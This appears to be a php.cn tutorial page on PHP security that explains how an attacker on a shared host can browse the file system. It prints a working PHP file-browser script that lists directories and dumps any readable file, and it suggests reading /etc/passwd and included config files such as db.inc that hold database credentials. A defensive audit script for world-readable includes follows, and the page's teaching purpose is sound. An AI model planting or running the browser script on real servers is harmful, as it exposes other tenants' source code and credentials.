
PHP Security - File System Browsing

黄舟
Release: 2023-03-05 20:44:01



File system browsing

In addition to reading arbitrary files on the shared server, an attacker can also write a script that browses the file system. Since most of your sensitive files will not be stored in your website's document root, this type of script is generally used to find where your source files are located. Consider the following example:

  <?php

  // Request routing: ?dir=... lists a directory, ?file=... dumps a file,
  // and the default is a listing of the file system root.
  if (isset($_GET['dir']))
  {
    ls($_GET['dir']);
  }
  elseif (isset($_GET['file']))
  {
    cat($_GET['file']);
  }
  else
  {
    ls('/');
  }

  // Print the contents of any file the web server user can read.
  function cat($file)
  {
    echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8');
  }

  // List a directory; every readable entry becomes a link back to this
  // script. $dir is expected to end with a slash.
  function ls($dir)
  {
    $handle = dir($dir);

    while ($filename = $handle->read())
    {
      $size = filesize("$dir$filename");

      if (is_dir("$dir$filename"))
      {
        $type = 'dir';
        $filename .= '/';
      }
      else
      {
        $type = 'file';
      }

      if (is_readable("$dir$filename"))
      {
        $line = str_pad($size, 15);
        $line .= "<a href=\"{$_SERVER['PHP_SELF']}";
        $line .= "?$type=$dir$filename\">$filename</a>";
      }
      else
      {
        $line = str_pad($size, 15);
        $line .= $filename;
      }

      echo "$line\n";
    }

    $handle->close();
  }

  ?>


An attacker may first look at the /etc/passwd file or the /home directory to obtain a list of usernames on the server; the location of source files stored outside the website's document root can then be discovered through language constructs such as include or require. For example, consider the following script file /home/victim/public_html/admin.php:

  <?php

  include '../inc/db.inc';

  /* ... */

  ?>


If an attacker manages to display the source code of this file, they can discover the location of db.inc and then use the readfile() function from their own script to expose its contents and gain access to the database. Thus, saving db.inc outside the website's document root does not protect it in this environment.

This attack illustrates why all source files on a shared server should be considered public, and why the database, rather than a file, should be chosen to hold all sensitive data.
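The precondition for the attack above is that a file such as ../inc/db.inc is readable by the user the shared PHP interpreter runs as, which on a typical shared host means it is readable by every tenant's script. The following audit script is an added example written for this page; it is not code from the original article or from php.cn. It takes an entry script, extracts the string-literal targets of its include/require statements (the same path information an attacker reads out of the source), and reports each target's mode bits, owner, whether the "other" read bit is set, and whether it sits inside the document root. The project tree it builds under the system temp directory, the file names and the "secret" inside db.inc are constructed for the demo; run it on a real entry script by calling auditEntryScript() with your own paths. It assumes PHP 8 on a Unix-like host, where chmod() and the "other" read bit are meaningful.

```php
<?php
declare(strict_types=1);

// Added example, not part of the original article: audit which included
// files any other account on a shared host could read. The "other" read bit
// (mode & 0004) is what makes ../inc/db.inc reachable from a neighbour's
// script, so it is the main finding. Paths and contents below are constructed.

/**
 * Static approximation of a script's include targets: string-literal
 * arguments of include/require(_once). Dynamic paths are not resolved.
 * Relative targets resolve against the including file's directory.
 *
 * @return string[] absolute paths (unresolvable targets are kept as written)
 */
function includedFiles(string $script): array
{
    $src = file_get_contents($script);
    if ($src === false) {
        return [];
    }
    $pattern = '/\b(?:include|require)(?:_once)?\s*\(?\s*([\'"])([^\'"]+)\1/';
    preg_match_all($pattern, $src, $m);
    $base = dirname(realpath($script) ?: $script);
    $out = [];
    foreach ($m[2] as $target) {
        $candidate = str_starts_with($target, '/') ? $target : $base . '/' . $target;
        $out[] = realpath($candidate) ?: $candidate;
    }
    return $out;
}

/** Exposure facts for one file, or null if it cannot be found. */
function describeExposure(string $path, string $docRoot): ?array
{
    $real = realpath($path);
    if ($real === false) {
        return null;
    }
    $mode = fileperms($real) & 0777;
    $uid = fileowner($real);
    $owner = function_exists('posix_getpwuid')
        ? (posix_getpwuid($uid)['name'] ?? (string) $uid)
        : (string) $uid;
    $root = rtrim(realpath($docRoot) ?: $docRoot, '/') . '/';
    return [
        'path'           => $real,
        'mode'           => sprintf('%04o', $mode),
        'owner'          => $owner,
        'world_readable' => ($mode & 0004) !== 0,   // readable by "other"
        'inside_docroot' => str_starts_with($real, $root),
    ];
}

/** One report row per file the entry script includes. */
function auditEntryScript(string $script, string $docRoot): array
{
    $rows = [];
    foreach (includedFiles($script) as $inc) {
        $rows[] = describeExposure($inc, $docRoot) ?? ['path' => $inc, 'missing' => true];
    }
    return $rows;
}

// --- Constructed demo tree mirroring the article's /home/victim layout ---
$home = sys_get_temp_dir() . '/victim_' . bin2hex(random_bytes(4));
mkdir("$home/public_html", 0755, true);
mkdir("$home/inc", 0755);
file_put_contents("$home/public_html/admin.php",
    "<?php\ninclude '../inc/db.inc';\nrequire_once('../inc/settings.inc');\n");
file_put_contents("$home/inc/db.inc", "<?php \$db_pass = 'constructed-secret';\n");
file_put_contents("$home/inc/settings.inc", "<?php \$debug = false;\n");
chmod("$home/inc/db.inc", 0644);       // common default: readable by every tenant
chmod("$home/inc/settings.inc", 0640); // owner and group only

foreach (auditEntryScript("$home/public_html/admin.php", "$home/public_html") as $row) {
    if (!empty($row['missing'])) {
        printf("MISSING  %s\n", $row['path']);
        continue;
    }
    printf("%s %s %-8s %s%s\n",
        $row['world_readable'] ? 'EXPOSED ' : 'ok      ',
        $row['mode'], $row['owner'], $row['path'],
        $row['inside_docroot'] ? '  (inside document root)' : '');
}

// Remove the constructed tree again.
foreach (["$home/public_html/admin.php", "$home/inc/db.inc", "$home/inc/settings.inc"] as $f) {
    unlink($f);
}
rmdir("$home/public_html");
rmdir("$home/inc");
rmdir($home);
```

Run with `php audit.php`; db.inc at mode 0644 is reported as EXPOSED while settings.inc at 0640 is not. Tightening the mode only helps when the interpreter does not run as a user shared with other tenants (for example under per-user PHP-FPM pools or suEXEC-style setups); where it does, the article's conclusion stands and the file is effectively public regardless of where it lives.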

The above is the content of PHP security-file system browsing. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!


source:php.cn